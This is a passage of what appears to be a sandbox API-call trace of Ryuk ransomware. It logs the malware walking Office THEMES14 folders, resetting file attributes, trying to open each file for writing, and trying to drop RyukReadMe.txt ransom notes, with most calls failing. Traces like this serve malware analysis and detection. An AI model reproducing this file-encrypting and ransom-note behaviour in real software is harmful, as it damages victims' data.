lpFindFileData=0x29ac2e0) returned 1 [0133.194] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.194] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM", dwFileAttributes=0x80) returned 0 [0133.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.194] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.194] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.194] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.194] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF", dwFileAttributes=0x80) returned 0 [0133.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.195] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.195] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.195] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.195] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.196] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.196] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.196] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.196] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.196] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.197] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.197] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.197] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.197] SetLastError (dwErrCode=0x0) [0133.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.197] GetLastError () returned 0x5 [0133.197] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.197] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.197] SetLastError (dwErrCode=0x0) [0133.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.198] GetLastError () returned 0x5 [0133.198] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.198] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.198] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.198] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.198] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.198] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.198] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM", dwFileAttributes=0x80) returned 0 [0133.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.199] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.199] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.199] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.199] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF", dwFileAttributes=0x80) returned 0 [0133.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.199] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.199] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.199] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.200] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.200] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.200] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.201] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.201] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.201] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.201] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.201] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.201] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.201] SetLastError (dwErrCode=0x0) [0133.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.201] GetLastError () returned 0x5 [0133.201] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.201] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.201] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.201] SetLastError (dwErrCode=0x0) [0133.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.202] GetLastError () returned 0x5 [0133.202] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.202] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.202] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.202] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.202] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.202] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM", dwFileAttributes=0x80) returned 0 [0133.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.202] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.202] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.202] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.202] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF", dwFileAttributes=0x80) returned 0 [0133.203] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.203] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.203] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.204] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.204] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.204] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.204] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.204] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.205] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.205] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.205] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.205] SetLastError (dwErrCode=0x0) [0133.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.205] GetLastError () returned 0x5 [0133.205] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.205] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.205] SetLastError (dwErrCode=0x0) [0133.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.205] GetLastError () returned 0x5 [0133.205] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.205] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.206] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.206] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.206] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM", dwFileAttributes=0x80) returned 0 [0133.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.206] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.206] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.207] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.207] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF", dwFileAttributes=0x80) returned 0 [0133.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.207] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.207] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.208] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.208] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.208] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.208] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.208] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.208] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.209] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.209] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.209] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.209] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.209] SetLastError (dwErrCode=0x0) [0133.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.209] GetLastError () returned 0x5 [0133.209] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.209] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.209] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.209] SetLastError (dwErrCode=0x0) [0133.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.209] GetLastError () returned 0x5 [0133.209] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.209] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.209] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.209] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.210] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.210] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.210] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM", dwFileAttributes=0x80) returned 0 [0133.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.210] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.210] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.211] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.211] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF", dwFileAttributes=0x80) returned 0 [0133.211] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.211] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.211] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.211] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.211] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.211] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.212] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.212] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.212] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.212] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.212] SetFileAttributesW (lpFileName="C:\\Program Files\\Common 